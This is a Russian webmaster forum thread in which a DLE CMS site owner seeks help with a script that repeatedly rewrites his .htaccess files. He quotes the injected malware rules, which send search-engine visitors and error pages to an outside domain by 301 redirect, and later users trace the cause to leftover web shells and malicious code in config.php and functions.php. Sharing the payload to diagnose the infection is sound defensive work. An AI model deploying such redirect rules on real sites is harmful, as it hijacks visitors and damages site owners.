X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Проблемы с .htaccess в DLE CMS, какой-то скрипт автоматически его меняет
jalil
jalil
Topic Starter сообщение 16.4.2012, 13:23; Ответить: jalil
Сообщение #1


Новичок
*

Группа: Viewer
Сообщений: 2
Регистрация: 16.4.2012
Поблагодарили: 0 раз
Репутация:   0  


Всем привет!

Столкнулся с неприятной для себя проблемой, пытаюсь решить ее уже долгое время, но никак не получается. Гуглил, яндексил, обращался к хостеру, бился головой об стену - сдвигов никаких. Остается надежда на Вас..

Суть проблемы:

имеется у меня хостинг, на нем около 5 сайтов на DLE. Версии движков разные, но всякие жизненно важные заплатки ставлю по мере возможности, вобщем стараюсь это дело не запускать. Несколько месяцев назад появилась проблема следующего характера - какая то, простите , хрень, меняет автоматом мои файлы .htacess , причем на всех сайтах сразу. В него она прописывает редирект пользователей приходящих на мой сайт с ПС на свои сайты (каждый раз разные).
Пароли менял, файлы сайтов проверял, скачивал на хард и сканировал, шеллов не нашел. Но воз и ныне там.
Сейчас эта ерунда вообще автоматизировалась и овервратит мне .htaccess с периодичностью в каждые полчаса-час.

Скорее всего это какая-то уязвимость в DLE , но где ее искать, может кто-то подскажет?

.htaccess меняется следующим образом:

Развернуть/Свернуть
В самом начале файла автоматом прописывается такая вот ерунда:

<IfModule mod_rewrite.c>
RewriteEngine On                                                                                    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|ao
l|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|fac
e
book|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigm
a
|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|
g
igablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|t
e
oma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchsp
o
t|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|ver
y
goodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|shareloo
k|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                            RewriteRule ^(.*)$ http://qimulta.ru/upday/index.php [R=301,L]                                                                                                                                                                RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvan
daag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatic
o
|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|
b
hanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory
|
hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseirelan
d|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir
|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|fin
d
how|icq|goo|westaustraliaonline)\.(.*)                                                            RewriteRule ^(.*)$ http://qimulta.ru/upday/index.php [R=301,L]                                                                                                                                                                </IfModule>


В конце файла - вот такая вот:

ErrorDocument 400 http://qimulta.ru/upday/index.php                                        ErrorDocument 401 http://qimulta.ru/upday/index.php
ErrorDocument 403 http://qimulta.ru/upday/index.php
ErrorDocument 404 http://qimulta.ru/upday/index.php
ErrorDocument 500 http://qimulta.ru/upday/index.php


На всякий случай - файл .htaccess после модификации:
_http://dump.ru/file/5697658

Сообщение отредактировал jalil - 16.4.2012, 13:26
1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Makssss07
Makssss07
сообщение 20.4.2012, 17:50; Ответить: Makssss07
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 863
Регистрация: 17.5.2010
Из: Питер
Поблагодарили: 263 раза
Репутация:   53  


У меня та же самая история только период замены пока подольше, перешарил все, где сидит гадость так и не нашел. В панели гугла появилась запись на одном сайте об обнаружении вируса. Возможно нужно попробовать его снести?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SpaceX
SpaceX
сообщение 20.4.2012, 18:06; Ответить: SpaceX
Сообщение #3


Участник
***

Группа: User
Сообщений: 205
Регистрация: 13.3.2011
Поблагодарили: 66 раз
Репутация:   18  


ув. товарищи - поздравляю, у вас вирус.
делайте бекапы, меняйте пароли и не сохраняйте их - записывайте на бумаге! ))

если хотите почистить сайты велком в ЛС...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bobur
bobur
сообщение 20.4.2012, 20:26; Ответить: bobur
Сообщение #4


Мастер Datalife Engine
******

Группа: Active User
Сообщений: 1421
Регистрация: 12.11.2009
Из: Планета Земля
Поблагодарили: 195 раз
Репутация:   59  


Надо поискать шеллы на папках... =)


--------------------
Мастер по Datalife Engine на ТУТ. ICQ:359803651.

CверхБыстрые VPS/VDS по системе Все включено! 60% скидка. Купон:60OFFAVPS
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 20.4.2012, 20:35; Ответить: fioru
Сообщение #5


Завсегдатай
*****

Группа: Active User
Сообщений: 508
Регистрация: 30.11.2010
Из: Смоленск
Поблагодарили: 172 раза
Репутация:   37  


Скорее не шеллы надо искать, а не жадничать и приобретать продукт который стоит своих денег
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Makssss07
Makssss07
сообщение 20.4.2012, 21:38; Ответить: Makssss07
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 863
Регистрация: 17.5.2010
Из: Питер
Поблагодарили: 263 раза
Репутация:   53  


(fioru @ 20.4.2012, 20:35) *
Скорее не шеллы надо искать, а не жадничать и приобретать продукт который стоит своих денег

Продукты, которые стоят своих денег увы тоже подвержены заболеваниям, и если вы с этим не сталкивались, то скорее всего это вопрос времени и везения.

Вредокод js найден, был в functions.php, что странно, его там не было раньше 100%, пассы сменил и записал на бумагу, лучше буду мучаться и каждый раз вводить.

За подсказку и айболита спасибо большое SpaceX


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 20.4.2012, 21:46; Ответить: fioru
Сообщение #7


Завсегдатай
*****

Группа: Active User
Сообщений: 508
Регистрация: 30.11.2010
Из: Смоленск
Поблагодарили: 172 раза
Репутация:   37  


Makssss07, скорее вопрос времени что сломают ПО, найдут дыру в другом месте, нежели в ДЛЕ последних версий без всяких посторонних модулей
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
jalil
jalil
Topic Starter сообщение 21.4.2012, 0:56; Ответить: jalil
Сообщение #8


Новичок
*

Группа: Viewer
Сообщений: 2
Регистрация: 16.4.2012
Поблагодарили: 0 раз
Репутация:   0  


Ребятки, посидел часок не отвлекаясь ни на что другое, и проблему вроде как решил собственными силами. Во всяком случае .htaccess не ревратится уже каждые 30 минут.
Проблема была в шелле двухгодичной давности, последствия которого я не снес до конца (сам вобщем-то виноват)...

Я уже забыл, что именно я снес, но : у кого подобные проблемы - внимательно смотрим свой config.php , нижние строчки... Как я понял, подобная кака касается не только DLE , а и всех сайтов на php.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
11 Nell 1068 Вчера, 15:21
автор: Nell
Открытая тема (нет новых ответов) Нужно перенести действующий интернет-магазин на CMS
Возможные CMS: PrestaShop, Битрикс, Magento, OpenCart
2 4aa19 291 8.12.2017, 17:59
автор: 4aa19
Открытая тема (нет новых ответов) Продажа баз доменов на различных эксклюзивных CMS.
Очень доступные цены. Более 300 cms
7 Nonsys 2168 7.12.2017, 20:05
автор: Nonsys
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКачественный прогон сайтов, по профилям и статьям. Множество cms. Цены от 250 рублей.!
Комплексная услуга! Прогон по базе более 600 сайтов
324 Nonsys 300641 7.12.2017, 19:49
автор: Nonsys
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
277 kaartes 102509 7.12.2017, 9:55
автор: Tootkin


 



RSS Текстовая версия Сейчас: 12.12.2017, 18:20
Дизайн